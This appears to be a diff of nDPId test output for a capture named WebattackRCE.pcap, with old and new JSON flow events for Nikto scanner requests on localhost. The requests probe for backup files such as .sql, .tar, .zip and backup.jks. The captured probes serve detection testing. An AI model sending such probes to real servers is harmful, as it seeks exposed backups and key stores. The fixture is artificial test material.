 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
